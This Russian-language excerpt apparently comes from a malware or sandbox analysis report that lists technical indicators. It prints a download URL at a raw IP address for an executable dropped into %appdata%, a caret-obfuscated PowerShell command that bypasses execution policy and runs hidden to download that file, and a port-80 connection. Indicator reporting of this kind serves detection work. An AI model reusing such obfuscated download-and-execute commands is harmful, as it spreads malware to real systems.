Техническая информация
- http://185.82.200.55/encrypted.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWe^r^s^HEll^.^E^xe -EXeC^U^T^Io^NP^OL^icY^ b^YpASS^ ^-n^opR^Of^ILE ^-wINdowstyL^e hId^de^n ^(New-obje^cT ^S^YsT^E^M.ne^T^.Web^cLIE^NT^).doW^nloa^dFilE('http://185.82.200.55/en...
- '18#.#2.200.55':80
- '<SYSTEM32>\cmd.exe' /c "PoWe^r^s^HEll^.^E^xe -EXeC^U^T^Io^NP^OL^icY^ b^YpASS^ ^-n^opR^Of^ILE ^-wINdowstyL^e hId^de^n ^(New-obje^cT ^S^YsT^E^M.ne^T^.Web^cLIE^NT^).doW^nloa^dFilE('http://185.82.200.55/en...' (со скрытым окном)